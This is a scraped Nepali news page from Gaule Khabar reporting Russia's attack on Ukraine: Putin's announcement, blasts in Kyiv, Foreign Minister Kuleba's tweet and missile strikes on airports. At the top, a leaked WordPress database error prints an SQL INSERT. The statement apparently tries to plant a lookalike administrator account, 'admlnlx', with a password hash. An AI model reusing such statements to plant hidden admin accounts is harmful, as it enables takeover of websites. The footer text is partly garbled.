WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BovS0StPruxmk5ZT1E3yNKhudEDSmv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 14:23:22', '', 'admlnlx', 'admlnlx')

रुसी ‘सैन्य कारबाही’ पछिको युक्रेन (तस्बिरहरू) – Gaule Khabar

रुसी ‘सैन्य कारबाही’ पछिको युक्रेन (तस्बिरहरू)

रुसी ‘सैन्य कारबाही’ पछिको युक्रेन (तस्बिरहरू)

काठमाडौं । रूसले युक्रेनमाथि सैन्य आक्रमण जारी राखेको छ । रुसी राष्ट्रपति भ्लादिमिर पुटिनले स्थानीय समय अनुसार ५ :५५ बजे सैन्य कारबाही घोषणा गरेको केही मिनेटपछि युक्रेनमाति हमला शुरू गरिएको विवरणहरूमा जनाएको छ।

रुसी राष्ट्रपति भ्लादिमिर पुटिनले युक्रेनको डोनबास क्षेत्रमा ‘सैन्य कारबाही’ को घोषणा गरे लगत्तै युक्रेनको राजधानी किइभमा विस्फोट हुन थालेको अन्तर्राष्ट्रिय सञ्चार माध्यमले जनाएका छन्।

रुसले पूर्वी युक्रेनमा आफ्ना सेनाविरुद्ध ‘भीषण गोलाबारी’ गरेको युक्रेनको सैन्य बलले जनाएको छ। युक्रेनका विदेशमन्त्री दिमेत्रो कुलेबाले ट्विट गर्दै भ्लादिमिर पुटिनले ‘‘युक्रेनमाथि पूर्ण स्तरको आक्रमण शुरू गरेको बताएका छन्। उनले अन्तर्राष्ट्रिय जगत्‌ले पुटिनलाई रोक्न सक्ने र रोक्नुपर्ने विषयमा जोड दिएका छन्।

रुसले युक्रेनको राजधानी किएभनजिकै रहेको एक विमानस्थलसहित देशका अन्य विभिन्न विमानस्थलमा पनि क्षेप्यास्त्र आक्रमण गरेको बताएको छ।युक्रेनको हवाई बलले रुसी हवाई हमलाको सामना गरिरहेको युक्रेनको सैन्य बलले जनाएको छ।
हेर्नुहोस् आक्रमणपछिका तस्बिरहरु:

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका